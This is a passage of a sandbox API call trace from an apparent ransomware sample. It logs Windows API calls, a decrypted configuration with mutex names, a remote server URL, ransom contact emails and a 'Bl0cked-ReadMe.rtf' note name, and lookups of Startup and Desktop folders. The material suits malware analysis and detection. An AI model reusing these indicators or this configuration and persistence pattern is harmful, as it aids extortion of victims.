WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13e82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0108.813] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13e82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0108.813] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0108.813] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0108.813] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ef48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0108.813] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0108.813] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0108.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0108.814] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0108.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0108.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0108.814] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0108.814] GetThreadLocale () returned 0x409 [0108.814] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0108.814] GetCurrentThreadId () returned 0xcc4 [0108.814] GetCurrentThreadId () returned 0xcc4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0108.814] GetThreadLocale () returned 0x409 [0108.814] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0108.814] GetThreadLocale () returned 0x409 [0108.814] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0108.814] GetCurrentThreadId () returned 0xcc4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0108.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0108.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0108.816] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0108.818] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0108.819] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0108.833] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0108.834] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0108.834] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0108.834] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0108.834] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0108.834] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0108.838] GetACP () returned 0x4e4 [0108.839] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0108.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.839] GetTickCount () returned 0x260c4 [0108.839] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=16562790980) returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x52\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x42\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x62\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x47\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x66\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x67\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.839] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0108.839] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0108.839] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0108.839] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0108.840] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0108.840] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0108.840] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0108.840] LockResource (hResData=0x50d55c) returned 0x50d55c [0108.840] FreeResource (hResData=0x50d55c) returned 0 [0108.840] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.840] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.840] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.840] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.840] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0108.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1404f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1404f60, cbMultiByte=38, lpWideCharStr=0x13fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.840] FreeResource (hResData=0x50d64c) returned 0 [0108.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1404f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.840] GetCurrentThreadId () returned 0xcc4 [0108.840] GetCurrentThreadId () returned 0xcc4 [0108.840] GetCurrentThreadId () returned 0xcc4 [0108.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13bcd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0108.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13bcd18, cbMultiByte=239, lpWideCharStr=0x13c2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0108.841] GetCurrentThreadId () returned 0xcc4 [0108.841] GetCurrentThreadId () returned 0xcc4 [0108.841] GetCurrentThreadId () returned 0xcc4 [0108.841] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.841] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13b399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0108.841] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13b399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0108.841] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0108.843] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0108.844] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0108.845] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0108.846] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0108.847] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0108.848] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0108.848] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0108.849] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13b39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0108.853] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x139c63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0108.853] 